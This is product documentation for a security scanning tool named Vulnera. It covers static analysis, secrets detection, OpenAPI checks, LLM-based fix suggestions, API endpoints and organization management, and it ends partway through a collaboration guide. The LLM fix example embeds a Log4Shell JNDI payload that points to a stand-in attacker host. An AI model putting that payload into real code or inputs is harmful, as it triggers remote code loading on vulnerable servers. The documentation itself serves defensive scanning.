unsafeusage patterns (Rust)
How It Works
Pipeline overview:
- Discovery — Walks the project and maps files to supported languages.
- Parsing — Builds syntax trees using Tree-sitter (with OXC for JS/TS when enabled).
- Rule matching — Applies TOML rule packs to AST patterns.
- Taint analysis — Tracks source → sink flow, intra- and inter-procedural.
- Call graph — Resolves function calls across files to expand taint reachability.
- Post-process — Dedupes, scores confidence/severity, emits unified findings.
Supported Languages
| Language | Parser | File Extensions |
|---|---|---|
| Python | tree-sitter-python | .py |
| JavaScript | tree-sitter-javascript / OXC | .js |
| TypeScript | tree-sitter-javascript / OXC | .ts |
| Rust | tree-sitter-rust | .rs |
| Go | tree-sitter-go | .go |
| C | tree-sitter-c | .c, .h |
| C++ | tree-sitter-cpp | .cpp, .cc, .hpp |
Note: JSX/TSX files are not scanned.
Analysis Depth (SAST)
Depth controls the SAST engine’s thoroughness (separate from orchestrator depth):
| Depth | Description |
|---|---|
quick | Pattern matching only (no data-flow analysis) |
standard | Patterns + intra-procedural data flow |
deep | Full analysis (patterns + data flow + call graph + inter-procedural) |
Dynamic depth adjustment is enabled by default. Large repositories are auto-downgraded to keep scans within time budgets. Disable with VULNERA__SAST__DYNAMIC_DEPTH_ENABLED=false.
Rule System
Rules are TOML-based and embedded at build time. You can optionally load Git-based rule packs.
Locations:
vulnera-sast/rules/*.toml— core rule packsvulnera-sast/taint-patterns/*.toml— taint sources/sinks/sanitizersvulnera-sast/tests/fixtures/— CVE fixtures for quality gates
CLI Usage (Actual Flags)
SAST runs via vulnera sast:
# Basic scan
vulnera sast .
# Severity filter
vulnera sast . --min-severity high
# Only changed files (git required)
vulnera sast . --changed-only
# Explicit file list
vulnera sast . --files src/main.rs,src/lib.rs
# Exclude paths (glob patterns)
vulnera sast . --exclude "tests/*,vendor/*"
Available flags:
--min-severity <critical|high|medium|low>--fail-on-vuln--changed-only--files <path1,path2,...>--exclude <glob1,glob2,...>--languages <lang1,lang2,...>(override auto-detection)--rules <category1,category2,...>(rule categories)--no-cache(disable incremental cache)--watch(continuous scanning)--fix(LLM-powered bulk fixes; requires online + auth + quota)--baseline <path>(baseline file for diff)--save-baseline(save current findings to baseline)--only-new(report only findings not in baseline)
Output
SAST findings are emitted in the unified finding schema:
severityandconfidencelocation(path + line/column)- optional
snippetandsemantic_path(taint trace)
You can emit SARIF:
vulnera sast . --format sarif > report.sarif
Configuration (Server + Library)
The SAST engine is configured via vulnera_core::config::SastConfig and AnalysisConfig.
Key settings:
analysis_depth = "quick|standard|deep"js_ts_frontend = "oxc_preferred" | "tree_sitter"enable_data_flow,enable_call_graphenable_ast_cache,ast_cache_ttl_hoursdynamic_depth_enabled, file/size thresholdsmin_finding_severity,min_finding_confidencerule_packsandrule_pack_allowlist
Example (TOML):
[sast]
analysis_depth = "standard"
js_ts_frontend = "oxc_preferred"
enable_data_flow = true
enable_call_graph = true
enable_ast_cache = true
dynamic_depth_enabled = true
min_finding_severity = "low"
min_finding_confidence = "low"
Offline Guarantees
SAST runs fully offline:
- No network calls
- All rule packs embedded unless you configure external rule packs
Quality Gates
The SAST module ships with a fixture-based accuracy harness enforced in CI.
Thresholds (from config/default.toml):
- Precision: ≥ 0.70
- Recall: ≥ 0.50
- Unique CWE coverage: ≥ 12
- Languages with fixtures: ≥ 7
Limitations
- Tree-sitter is syntax-level; no macro expansion or full type resolution.
- Dynamic code generation and runtime behavior are out of scope.
- JSX/TSX files are excluded.
Next Steps
Secrets Detection Module
The Secrets Detection module finds hardcoded credentials and sensitive tokens in source code using regex-based rules and entropy heuristics. It runs fully offline by default, with optional online verification for select providers.
Detection Methods
| Method | Description | Offline |
|---|---|---|
| Regex rules | Known secret patterns with context keywords | ✅ Yes |
| Entropy | High-entropy token detection (Base64/hex/generic) | ✅ Yes |
| Verification | Optional provider checks (AWS/GitHub/GitLab) | ❌ No |
Supported Secret Types
Examples include:
- Cloud credentials (AWS, Azure, GCP)
- API keys and tokens (Stripe, Twilio, GitHub, GitLab, generic API keys)
- OAuth/JWT/Bearer tokens
- Database connection strings and passwords
- Private keys (RSA/EC/PGP/SSH)
- High-entropy strings (Base64/hex/generic tokens)
How It Works
- Discovery — Walks files within the scan root.
- Regex rules — Applies built-in secret patterns.
- Entropy detection — Flags high-entropy strings using thresholds.
- Optional verification — Provider-specific checks (disabled by default).
- Post-process — Dedupes and emits unified findings.
CLI Usage (Actual Flags)
Secrets detection runs via vulnera secrets:
# Basic scan
vulnera secrets .
# Only changed files (git required)
vulnera secrets . --changed-only
# Specific files
vulnera secrets . --files src/config.rs,src/lib.rs
# Exclude paths (glob patterns)
vulnera secrets . --exclude "tests/*,vendor/*"
# Include entropy-based detections (more noise)
vulnera secrets . --include-entropy
Available flags:
--fail-on-secret--changed-only--files <path1,path2,...>--exclude <glob1,glob2,...>--include-tests--include-entropy--no-cache--watch
Output
Secrets findings follow the unified finding schema:
secret_metadatais populatedvulnerability_metadatamay be emptyenrichmentis optional (LLM)
You can emit SARIF:
vulnera secrets . --format sarif > report.sarif
Configuration (Server + Library)
Secrets detection is configured via vulnera_core::config::SecretDetectionConfig.
Key settings:
enable_entropy_detectionbase64_entropy_threshold,hex_entropy_thresholdexclude_patterns,exclude_extensionsbaseline_file_path,update_baselinescan_git_history,max_commits_to_scanenable_verification(default: false)
Example (TOML):
[secret_detection]
enable_entropy_detection = true
base64_entropy_threshold = 4.5
hex_entropy_threshold = 3.0
exclude_patterns = ["node_modules", ".git", "target"]
exclude_extensions = ["md", "markdown", "rst", "html"]
scan_git_history = false
enable_verification = false
Offline Guarantees
Secrets detection runs fully offline by default:
- No network calls
- Regex rules and entropy heuristics are local
- Verification is opt-in and requires network access
Limitations
- Entropy detection can surface false positives in test fixtures and generated tokens.
- Markdown and certain doc extensions are excluded by default unless explicitly included.
- Verification is limited to supported providers.
Next Steps
Secrets Detection
Vulnera Secrets detects hardcoded credentials and sensitive tokens using regex-based rules and entropy heuristics. It runs fully offline by default, with optional provider verification.
What It Detects
Common categories include:
- Cloud credentials (AWS, Azure, GCP)
- API keys and tokens (Stripe, Twilio, GitHub, GitLab, generic API keys)
- OAuth/JWT/Bearer tokens
- Database connection strings and passwords
- Private keys (RSA/EC/PGP/SSH)
- High-entropy strings (Base64/hex/generic tokens)
How It Works
Pipeline overview:
- Discovery — Walks files within the scan root.
- Regex rules — Applies built-in secret patterns (rule pack).
- Entropy detection — Flags high-entropy strings (Base64/hex + generic heuristics).
- Optional verification — Provider-specific verification (disabled by default).
- Post-process — Dedupes and emits unified findings.
Detection Methods
| Method | Description | Offline |
|---|---|---|
| Regex rules | Known secret patterns with context keywords | ✅ Yes |
| Entropy | High-entropy token detection (Base64/hex/generic) | ✅ Yes |
| Verification | Optional provider checks (AWS/GitHub/GitLab) | ❌ No |
CLI Usage (Actual Flags)
Secrets detection runs via vulnera secrets:
# Basic scan
vulnera secrets .
# Only changed files (git required)
vulnera secrets . --changed-only
# Specific files
vulnera secrets . --files src/config.rs,src/lib.rs
# Exclude paths (glob patterns)
vulnera secrets . --exclude "tests/*,vendor/*"
# Include entropy-based detections (more noise)
vulnera secrets . --include-entropy
Available flags:
--fail-on-secret--changed-only--files <path1,path2,...>--exclude <glob1,glob2,...>--include-tests--include-entropy--no-cache--watch
Output
Secrets findings follow the unified finding schema. For secret findings:
secret_metadatais populatedvulnerability_metadatamay be emptyenrichmentis optional (LLM)
You can emit SARIF:
vulnera secrets . --format sarif > report.sarif
Configuration (Server + Library)
Secrets detection is configured via vulnera_core::config::SecretDetectionConfig.
Key settings:
enable_entropy_detectionbase64_entropy_threshold,hex_entropy_thresholdexclude_patterns,exclude_extensionsbaseline_file_path,update_baselinescan_git_history,max_commits_to_scanenable_verification(default: false)
Example (TOML):
[secret_detection]
enable_entropy_detection = true
base64_entropy_threshold = 4.5
hex_entropy_threshold = 3.0
exclude_patterns = ["node_modules", ".git", "target"]
exclude_extensions = ["md", "markdown", "rst", "html"]
scan_git_history = false
enable_verification = false
Offline Guarantees
Secrets detection runs fully offline by default:
- No network calls
- Regex rules and entropy heuristics are local
- Verification is opt-in and requires network access
Limitations
- Entropy detection can surface false positives in test fixtures and generated tokens.
- Markdown and certain doc extensions are excluded by default unless explicitly included.
- Verification is limited to supported providers.
Next Steps
API Security
The API Security module analyzes OpenAPI 3.x specifications to identify security vulnerabilities and design misconfigurations before deployment. It runs fully offline and is triggered when an OpenAPI spec is detected (or explicitly provided).
Supported Specifications
- OpenAPI 3.0
- OpenAPI 3.1
Analyzer Categories (Actual)
These analyzers run on the parsed OpenAPI spec:
- Authentication — missing auth, weak schemes (e.g., basic), insecure auth usage
- Authorization — missing authorization checks, overly permissive access
- Input Validation — missing request validation, unsafe parameter shapes
- Data Exposure — sensitive data in URLs/headers, response overexposure
- Security Headers — missing CSP/HSTS/XFO/XCTO; CORS review
- OAuth/OIDC — insecure flows, redirect issues, token validation gaps
- Design — versioning and error-handling issues
- Security Misconfiguration — insecure defaults and configuration pitfalls
- Resource Restriction — missing request size/limit constraints
Notable Checks
- CORS wildcard detection:
Access-Control-Allow-Origin: *is flagged as high severity. - Missing security headers: required headers are validated per response.
- Missing authentication: endpoints with no security requirements are flagged.
Configuration
The module is configured via vulnera_core::config::ApiSecurityConfig.
Key settings
enabled_analyzers: list of analyzers to run (empty = all)severity_overrides: map of vulnerability type → severityexclude_paths: skip specific API pathsstrict_mode: more aggressive checks
Example (TOML)
[api_security]
enabled_analyzers = ["authentication", "authorization", "input_validation", "security_headers"]
exclude_paths = ["/health", "/metrics"]
strict_mode = true
[api_security.severity_overrides]
"missing_authentication" = "high"
"insecure_cors" = "high"
CLI Usage
Analyze a spec directly using the CLI:
# Auto-detect spec in a directory
vulnera api .
# Analyze an explicit spec file
vulnera api . --spec ./openapi.yaml
Relevant flags:
--spec <path>— explicit OpenAPI spec path--min-severity <critical|high|medium|low>--fail-on-issue--framework <name>(optional)
Output
Findings are emitted in the unified finding schema with:
severityandconfidencelocation(path + operation)descriptionandrecommendation
SARIF output is supported:
vulnera api . --format sarif > report.sarif
Limitations
- Relies on the spec as the source of truth — runtime behavior is out of scope.
- Missing or incomplete specs will limit detection.
Next Steps
LLM Features (Explanations, Fixes, Queries)
Vulnera’s LLM features are post-processing only. Detection is performed by SAST, Secrets, API Security, and Dependency Analysis modules; LLMs are used to explain findings and propose fixes after the scan. LLM calls require network access and valid provider credentials.
What’s Available
1) Explain a Vulnerability (API)
Endpoint:
POST /api/v1/llm/explain
Request (example):
{
"vulnerability_id": "CVE-2021-44228",
"description": "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP endpoints.",
"affected_component": "org.apache.logging.log4j:log4j-core",
"audience": "technical"
}
Response (example):
{
"explanation": "This vulnerability allows remote code execution because ...",
"key_points": ["Remote Code Execution", "JNDI Injection", "Critical Severity"],
"mitigation_steps": ["Upgrade to version 2.15.0", "Disable JNDI lookup"]
}
2) Generate a Code Fix (API)
Endpoint:
POST /api/v1/llm/fix
Request (example):
{
"vulnerability_id": "CVE-2021-44228",
"vulnerable_code": "logger.error(\"${jndi:ldap://attacker.com/a}\");",
"language": "java",
"context": "src/main/java/com/example/App.java"
}
Response (example):
{
"fixed_code": "logger.error(\"User input: {}\", sanitizedInput);",
"explanation": "Replaced direct string concatenation with parameterized logging.",
"confidence": 0.95
}
3) Natural Language Query (API)
Endpoint:
POST /api/v1/llm/query
Request (example):
{
"query": "How do I fix the SQL injection in login.php?",
"context": { "file": "login.php", "content": "..." }
}
Response (example):
{
"answer": "Use prepared statements and parameterized queries...",
"references": ["https://owasp.org/www-community/attacks/SQL_Injection"]
}
4) Enrich Job Findings (API)
Endpoint:
POST /api/v1/jobs/{job_id}/enrich
Request (example):
{
"finding_ids": ["finding_123", "finding_456"],
"code_contexts": {
"finding_123": "def login(user, password):\n query = f\"SELECT * FROM users WHERE user='{user}'\""
}
}
Response (example):
{
"job_id": "550e8400-e29b-41d4-a716-446655440000",
"enriched_count": 5,
"failed_count": 1,
"findings": [
{ "id": "finding_123", "severity": "Critical", "description": "SQL Injection...", "location": "src/auth.py:42:10", "explanation": "...", "remediation_suggestion": "Use parameterized queries..." }
]
}
CLI Support
Generate a Fix (CLI)
Command:
vulnera generate-fix
Usage:
vulnera generate-fix \
--vulnerability CVE-2021-44228 \
--code src/main/java/com/example/App.java \
--line 42
Notes:
- Requires online mode, authentication, and available quota.
- If offline, unauthenticated, or quota exceeded, the command exits with an error code.
Bulk SAST Fix Suggestions (CLI)
Command:
vulnera sast --fix
Usage:
vulnera sast . --fix
Notes:
- Runs SAST locally, then uses the server for LLM-powered fix suggestions.
- Requires online mode and authentication.
Provider Configuration
LLM providers are configured via vulnera_core::config::LlmConfig and environment variables.
Provider Selection
VULNERA__LLM__PROVIDER=google_ai|openai|azureVULNERA__LLM__DEFAULT_MODELVULNERA__LLM__TEMPERATUREVULNERA__LLM__MAX_TOKENSVULNERA__LLM__TIMEOUT_SECONDSVULNERA__LLM__ENABLE_STREAMING
Google AI (Gemini)
GOOGLE_AI_KEYVULNERA__LLM__GOOGLE_AI__BASE_URL
OpenAI
OPENAI_API_KEYVULNERA__LLM__OPENAI__BASE_URLVULNERA__LLM__OPENAI__ORGANIZATION_ID
Azure OpenAI
AZURE_OPENAI_KEYVULNERA__LLM__AZURE__ENDPOINTVULNERA__LLM__AZURE__DEPLOYMENTVULNERA__LLM__AZURE__API_VERSION
Quota and Cost
LLM operations are higher-cost than standard analysis:
- Analysis: 3 tokens
- LLM (explain/fix/query): 6 tokens
Use LLM sparingly for high-severity findings, and prefer batch enrichment for efficiency.
Troubleshooting
LLM requests fail in offline mode
LLM requires network access. Remove --offline and ensure the server is reachable.
Authentication required
Run vulnera auth login or set VULNERA_API_KEY.
Quota exceeded
Check vulnera quota and reduce LLM usage or wait for reset.
Next Steps
Web Dashboard (API-First Guidance)
Vulnera is API-first and does not ship a bundled web UI in this repository. If you need a dashboard, use the API endpoints below to build your own UI or integrate with existing tools.
Core API Endpoints
Health & Docs
GET /health— service healthGET /metrics— metrics endpointGET /docs— Swagger UI (if enabled)GET /api-docs/openapi.json— OpenAPI spec
Jobs & Analysis
POST /api/v1/analyze/job— create analysis jobGET /api/v1/jobs/{id}— get job status/result
Organizations
POST /api/v1/organizations— create organizationGET /api/v1/organizations— list organizationsGET /api/v1/organizations/{id}— organization detailsPUT /api/v1/organizations/{id}— update organizationDELETE /api/v1/organizations/{id}— delete organizationGET /api/v1/organizations/{id}/members— list membersPOST /api/v1/organizations/{id}/members— invite memberDELETE /api/v1/organizations/{id}/members/{user_id}— remove memberPOST /api/v1/organizations/{id}/leave— leave organizationPOST /api/v1/organizations/{id}/transfer— transfer ownership
Analytics & Quota
GET /api/v1/organizations/{id}/analytics/dashboard— org dashboard statsGET /api/v1/organizations/{id}/analytics/usage— org usageGET /api/v1/organizations/{id}/analytics/quota— org quotaGET /api/v1/me/analytics/dashboard— personal dashboard statsGET /api/v1/me/analytics/usage— personal usageGET /api/v1/quota— quota usage
LLM Features (Optional)
POST /api/v1/llm/explainPOST /api/v1/llm/fixPOST /api/v1/llm/queryPOST /api/v1/jobs/{job_id}/enrich
Authentication & Security
- Cookie auth uses JWT + CSRF.
- API key auth uses
X-API-Keyheader. - CORS must be configured for your UI origin.
- Swagger UI can be disabled in production via config.
Building Your Own Dashboard
A minimal dashboard typically includes:
- Organization selector
- Recent jobs list (
/organizations/{id}/analytics/dashboard) - Findings view (from job detail:
/jobs/{id}) - Quota widget (
/organizations/{id}/analytics/quotaor/api/v1/quota) - Usage charts (
/organizations/{id}/analytics/usage)
Configuration Reference
See:
Next Steps
Organization Management Guide
Organizations in Vulnera enable team collaboration with shared quotas, centralized reporting, and role-based access control. This guide covers everything you need to manage your organization effectively.
Creating an Organization
Step-by-Step Setup
-
Navigate to Organization Creation
- Click + New Organization in the sidebar
- Or go to Dashboard → Organizations → Create New
-
Fill in Organization Details
- Organization Name — Your company or team name (e.g., “Acme Security Team”)
- Description — Brief description of the organization’s purpose
- Logo — Optional: Upload organization logo (PNG, JPG, 512×512px recommended)
- Contact Email — Primary contact for billing and notifications
-
Select Plan Tier
- Free — 48 tokens/month, up to 5 members, basic integrations
- Pro — 1000 tokens/month, unlimited members, advanced integrations
- Enterprise — Custom tokens, SSO/SAML, custom domains, priority support
-
Confirm Creation
- Review settings
- Click Create Organization
- You’re automatically made Owner and Organization Admin
Post-Creation Setup Checklist
- Upload organization logo
- Add organization description
- Set up billing (if on paid plan)
- Invite team members
- Generate API key
- Configure integrations
- Set notification preferences
Organization Roles & Permissions
Role Hierarchy
Owner
↓ (can delegate to)
Admin
↓ (can delegate to)
Member
Viewer (read-only)
Detailed Permissions Matrix
| Permission | Owner | Admin | Member | Viewer |
|---|---|---|---|---|
| Scans | ||||
| Create scans | ✅ | ✅ | ✅ | ❌ |
| View scans | ✅ | ✅ | ✅ | ✅ |
| Delete scans | ✅ | ✅ | ❌ | ❌ |
| Export scan results | ✅ | ✅ | ✅ | ✅ |
| Findings | ||||
| View findings | ✅ | ✅ | ✅ | ✅ |
| Resolve findings | ✅ | ✅ | ✅ | ❌ |
| Mark false positive | ✅ | ✅ | ✅ | ❌ |
| Organization Settings | ||||
| View settings | ✅ | ✅ | ❌ | ❌ |
| Modify general info | ✅ | ✅ | ❌ | ❌ |
| Manage members | ✅ | ✅ | ❌ | ❌ |
| Manage API keys | ✅ | ✅ | ❌ | ❌ |
| Billing & Subscriptions | ||||
| View billing | ✅ | ❌ | ❌ | ❌ |
| Manage billing | ✅ | ❌ | ❌ | ❌ |
| Upgrade plan | ✅ | ❌ | ❌ | ❌ |
| Integrations | ||||
| View integrations | ✅ | ✅ | ❌ | ❌ |
| Configure integrations | ✅ | ✅ | ❌ | ❌ |
| Manage webhooks | ✅ | ✅ | ❌ | ❌ |
| Audit & Compliance | ||||
| View audit logs | ✅ | ✅ | ❌ | ❌ |
| Export organization data | ✅ | ❌ | ❌ | ❌ |
| Delete organization | ✅ | ❌ | ❌ | ❌ |
When to Use Each Role
-
Owner — Organization founders, ultimate decision-makers, billing contact
- Best for: 1-2 key decision-makers per organization
- Caution: Rarely needed, keep minimal
-
Admin — Team leads, security directors, technical leads
- Best for: Day-to-day organization management
- Responsibility: Member provisioning, integration setup
-
Member — Developers, security engineers, DevOps engineers
- Best for: Active security practitioners who scan code
- Permissions: Run scans, view/resolve findings
-
Viewer — Executives, managers, stakeholders (read-only)
- Best for: Non-technical decision-makers who need visibility
- Permissions: View scans, findings, reports (no modifications)
Managing Team Members
Inviting Members
Method 1: Dashboard Invitation
- Go to Settings → Members
- Click Invite Member
- Enter email address(es) — comma-separated for bulk invite
- Select role for each member:
- Admin (for team leads)
- Member (for developers)
- Viewer (for stakeholders)
- Click Send Invitations
- Members receive email with join link (valid for 7 days)
Method 2: Share Organization Link
- Go to Settings → Members → Copy Share Link
- Share link with team (anyone with link can request access)
- Requests appear in pending approval queue
- Admin reviews and approves/denies
Accepting an Invitation
Members receive email from invite@vulnera.studio:
- Click Join Organization link
- Sign in to Vulnera account (create if needed)
- Click Accept Invitation
- Redirect to organization dashboard
- Immediately have access to shared quota and scans
Member Status States
| Status | Description | Action |
|---|---|---|
| Invited | Email sent, awaiting acceptance | Can resend invite or cancel |
| Active | Member joined and has access | Can change role or remove |
| Pending Approval | Join request submitted (if approval required) | Admin can approve/deny |
| Inactive | Member inactive >30 days | Can reactivate or remove |
| Removed | Former member, no access | Can reinvite |
Changing Member Roles
- Go to Settings → Members
- Find member in list
- Click member row → Edit
- Change role dropdown
- Click Save — changes take effect immediately
- Member receives notification of role change
Removing Members
- Go to Settings → Members
- Click member → Remove
- Confirm removal
- Member loses all access immediately
- Their scans remain in history (read-only for audit purposes)
Note: Removed members can be reinvited later.
Viewing Member Activity
Member Details Page:
- Go to Settings → Members
- Click member name
- View:
- Email address, role, join date
- Last active timestamp
- Scans created by member
- API keys generated by member
- Activity timeline
Organization Audit Log (Admin only):
- Go to Settings → Audit Log
- Filter by member:
- Action type (invited, removed, scan created, etc.)
- Member email
- Date range
- Export as CSV for compliance
Shared Quota Management
Understanding Organization Quotas
When members scan within an organization, tokens are consumed from the shared organization quota, not individual quotas.
Example:
- Organization quota: 1000 tokens/month (Pro plan)
- Member A creates scan: uses 10 tokens from shared pool
- Member B creates scan: uses 15 tokens from shared pool
- Remaining: 975 tokens available to all members
Quota Allocation Strategies
Strategy 1: Fully Shared (Default)
- All members share single quota pool
- Transparent: Anyone can see total usage
- Best for: Small, collaborative teams
Strategy 2: Department Quotas (Enterprise)
- Divide quota by team (e.g., 400 tokens/Backend team, 300/Frontend)
- Managed via API or contact sales
- Best for: Large organizations with multiple teams
Strategy 3: Per-Member Budgets (Enterprise)
- Set individual limits per member (e.g., 50 tokens/developer)
- Prevents single member from exhausting quota
- Best for: Organizations with varied usage patterns
Monitoring Quota Usage
Organization Dashboard:
- Go to Organization → Analytics → Dashboard
- View:
- Total tokens used this month
- Tokens remaining
- Usage trend graph (last 6 months)
- Per-member breakdown table
Usage Breakdown:
Total: 850 / 1000 tokens used (85%)
By Module:
├── Dependency Analysis: 450 tokens (53%)
├── SAST: 300 tokens (35%)
├── Secrets: 75 tokens (9%)
└── API Security: 25 tokens (3%)
By Member:
├── alice@acme.com: 400 tokens (47%)
├── bob@acme.com: 300 tokens (35%)
└── charlie@acme.com: 150 tokens (18%)
Setting Quota Alerts
Configure notifications when quota usage reaches thresholds:
- Go to Settings → Notifications → Quota Alerts
- Enable alerts at:
- 50% usage
- 75% usage
- 90% usage
- 100% (exhausted)
- Choose notification method:
- Email (sent to organization contact)
- Slack (if integrated)
- In-app notification
- Save
Upgrading Quota
Option 1: Upgrade Plan
- Free → Pro: +952 tokens (1000 total)
- Pro → Enterprise: Custom allocation
- Go to Settings → Billing → Upgrade Plan
Option 2: Temporary Quota Boost (Enterprise)
- Purchase additional tokens mid-month
- Contact sales@vulnera.studio
- Available for 30 days, expires unused
Organization Settings
General Settings
Organization Profile:
- Organization name
- Description
- Logo (upload new or remove)
- Contact email
- Website URL (optional)
Edit: Settings → General → Edit Profile
Security Settings
Two-Factor Authentication (for members):
- Require 2FA for all members (optional, Admin sets)
- Go to Settings → Security → Require 2FA
Session Management:
- Session timeout: 30 minutes (default)
- Custom timeout available (Enterprise)
- Go to Settings → Security → Session Policy
IP Whitelisting (Enterprise):
- Restrict access to specific IP ranges
- Useful for VPN-only access
- Go to Settings → Security → IP Whitelist
SSO/SAML (Enterprise):
- Single sign-on via Okta, Azure AD, Google Workspace
- Auto-provisioning of team members
- Go to Settings → Security → SSO Configuration
Data & Privacy
Data Retention Policy:
- Set how long scan results are kept (30 days to 2 years)
- Default: 1 year
- Go to Settings → Data → Retention Policy
Data Export:
- Export all organization data (GDPR compliance)
- Includes scans, findings, member list, audit logs
- Go to Settings → Data → Export Organization Data
Data Deletion:
- Permanently delete organization and all data (irreversible)
- Requires Owner password confirmation
- Go to Settings → Data → Delete Organization
Billing & Subscriptions
View Subscription:
- Go to Settings → Billing → Subscription
- View:
- Current plan (Free/Pro/Enterprise)
- Billing cycle (monthly/annual)
- Next billing date
- Annual savings (if on annual plan)
Update Payment Method:
- Go to Settings → Billing → Payment Method
- Click Edit
- Update card details or select different card
- Click Save
Invoices & History:
- Go to Settings → Billing → Invoices
- View all past invoices (searchable)
- Download as PDF
- Filter by date range
Upgrade/Downgrade Plan:
- Go to Settings → Billing → Change Plan
- Select new plan
- Review pricing impact
- Click Confirm Upgrade/Downgrade
- Changes take effect immediately (or at next cycle)
Integrations & Webhooks
Slack Integration
Setup:
- Go to Settings → Integrations → Slack
- Click Connect Slack Workspace
- Select Vulnera workspace and authorize
- Select notification channel
- Enable notification types:
- Critical findings
- Daily summary
- Weekly report
- Quota alerts
Slack Notifications Example:
🚨 Critical Vulnerability Detected
Repository: acme/backend
Finding: SQL Injection in POST /api/users
Severity: Critical (CVSS 9.2)
Module: SAST
👉 View Details
Disable Slack:
- Go to Settings → Integrations → Slack
- Click Disconnect
GitHub Integration
Setup:
- Go to Settings → Integrations → GitHub
- Click Connect GitHub
- Authorize Vulnera GitHub App
- Select repositories to scan
- Configure auto-scan triggers:
- On push to main/develop
- On all pull requests
- Scheduled daily
GitHub Features:
- PR comments with findings
- Status checks (block merge if critical)
- SARIF upload to code scanning
- Auto-create issues for high-severity findings
Manage Repositories:
- Add new repos: Settings → Integrations → GitHub → Add Repository
- Remove repos: Settings → Integrations → GitHub → Remove (⋯)
GitLab Integration
Setup (via CI/CD):
In .gitlab-ci.yml:
vulnera-scan:
image: vulnera:latest
script:
- vulnera auth login --api-key $VULNERA_API_KEY
- vulnera analyze . --all-modules --format sarif > vulnera.sarif
artifacts:
reports:
sast: vulnera.sarif
paths:
- vulnera.sarif
allow_failure: true
Webhooks
Create Webhook:
- Go to Settings → Webhooks → Add Webhook
- Enter webhook URL (must be HTTPS)
- Select events:
scan.started— Analysis job startedscan.completed— Analysis finishedfinding.created— New vulnerability detectedfinding.resolved— Manually marked resolved
- (Optional) Set webhook secret for signature verification
- Click Create
Test Webhook:
- Go to Settings → Webhooks
- Find webhook in list
- Click Test → sends sample payload to URL
- View response status and body
Webhook Payload:
{
"event": "scan.completed",
"scan_id": "scan-abc123def456",
"organization_id": "org-xyz789",
"project": {
"name": "acme/backend",
"source": "github",
"url": "https://github.com/acme/backend"
},
"analysis_results": {
"total_findings": 12,
"critical": 2,
"high": 5,
"medium": 4,
"low": 1
},
"modules_run": [
"dependencies",
"sast",
"secrets"
],
"timestamp": "2024-01-15T14:30:00Z",
"duration_seconds": 245
}
Webhook Security:
- Always use HTTPS
- Verify webhook signature on your server
- Signature header:
X-Vulnera-Signature: sha256=<hash> - Implement timeout/retry logic
Audit & Compliance
Audit Log
Organization admins can view all member actions and configuration changes.
Access Audit Log:
- Go to Settings → Audit Log
- View entries (newest first):
- Timestamp
- Member email
- Action (invited, scan created, key generated, etc.)
- Resource affected
- IP address
Filter Audit Log:
- By action type (Member activity, Configuration, Scan, Integration)
- By member email
- By date range
- By resource (scan ID, API key ID, etc.)
Export Audit Log:
- Go to Settings → Audit Log → Export
- Select date range
- Choose format: CSV or JSON
- Download file
Audit Log Retention:
- Free plan: 30 days
- Pro: 90 days
- Enterprise: 2 years (configurable)
Compliance Reports
Generate Compliance Report:
- Go to Reports → Compliance Reports
- Select framework:
- SOC2 Type II
- ISO 27001
- GDPR
- HIPAA (Enterprise)
- PCI DSS (Enterprise)
- Select date range
- Click Generate
- Download as PDF
Report Contents:
- Organization access controls summary
- Member provisioning/deprovisioning records
- Security incident history
- Data handling practices
- Audit log excerpts
Best Practices
Organization Structure
Small Teams (1-10 members):
- 1 Owner
- 1-2 Admins
- Rest as Members/Viewers
- Shared quota sufficient
Medium Teams (10-50 members):
- 1 Owner
- 3-5 Admins (by department/team)
- Members/Viewers as needed
- Consider department quotas (Enterprise)
Large Organizations (50+ members):
- 1 Owner
- 10+ Admins (by team/geography)
- Hierarchical teams (Enterprise)
- Custom RBAC roles (Enterprise)
- SSO/SAML mandatory
Member Lifecycle
Onboarding:
- Invite new member with appropriate role
- Have member review organization settings
- Add to Slack channel notifications
- Provide API key for CLI (if Member/Admin)
- Confirm first scan works
Offboarding:
- Remove member from organization
- Revoke API keys (if any)
- Review scans they created (for audit)
- Export member’s contributions (if needed)
- Archive related configurations
Security Practices
✅ Do:
- Assign minimal required role (principle of least privilege)
- Use Viewers for non-technical stakeholders
- Rotate API keys every 90 days
- Enable 2FA for all members (if available)
- Audit member list quarterly
- Review audit logs monthly
- Enable webhook signature verification
❌ Don’t:
- Share API keys between members
- Grant Owner role to multiple people
- Use generic/shared email addresses
- Disable audit logging
- Leave unused integrations connected
- Ignore quota warnings
Troubleshooting
Q: Member invited but never received email
A: 1. Check their spam folder
2. Resend invite: Settings → Members → Resend
3. Verify email address spelling
4. Check if email is already registered (member may self-join)
Q: Member can’t see organization scans
A: 1. Verify member role is not Viewer
2. Confirm member accepted invitation
3. Member should log out and log back in
4. Clear browser cache
5. Check audit log for removal records
Q: API key not working for organization scans
A: 1. Verify key belongs to org admin/member
2. Check key hasn't expired (Settings → API Keys)
3. Confirm key has org scope (not just personal)
4. Regenerate if needed
5. Verify member role allows scan creation
Q: Quota exhausted early
A: 1. Review usage (Analytics → Dashboard)
2. Check for duplicate scans
3. Optimize scan targets (exclude node_modules, etc.)
4. Upgrade plan (Settings → Billing)
5. Contact sales for temporary boost (Enterprise)
Q: How to transfer organization ownership
A: 1. Owner adds desired new owner as Admin
2. New owner transfers via Settings → Transfer Ownership
3. Current owner confirms transfer
4. Former owner demoted to Admin automatically
Next Steps
- Set Up Integrations — Connect Slack, GitHub for automated workflows
- Configure Webhooks — Feed findings to your ticketing system
- Generate Your First Report — Create compliance or executive summary report
- Audit Organization — Review member list and access quarterly
For team collaboration workflows, see Team Collaboration Guide. For dashboard features, see Dashboard Guide.
Need help? Email support@vulnera.studio or visit our FAQ.
Team Collaboration Guide
Vulnera enables seamless collaboration across security teams, DevOps, and developers. This guide covers workflows for shared vulnerability analysis, coordinated remediation, and team-based security practices.
Collaboration Workflows
Shared Analysis Setup
Scenario: Security team wants developers to run scans and review findings together
-
Create Organization
- Go to Dashboard → + New Organization
- Name: “Engineering Security”
- Add organization description
-
Invite Team Members
- Go to Settings → Members → Invite Member
- Invite developers with Member role (can create scans, resolve findings)
- Invite security lead with Admin role (manage integrations, settings)
- Invite executives with Viewer role (read-only access to reports)
-
Set Up Shared Quota
- Organization gets shared token pool (e.g., 1000 tokens/month for Pro)
- All members draw from same pool
- No individual limits unless configured (Enterprise)
-
Enable Notifications
- Settings → Integrations → Slack
- Connect team Slack workspace
- Enable daily summary and critical finding alerts
- All members get notifications in shared channel
Scan Coordination
Multi-stage scanning workflow:
Developer creates scan
↓
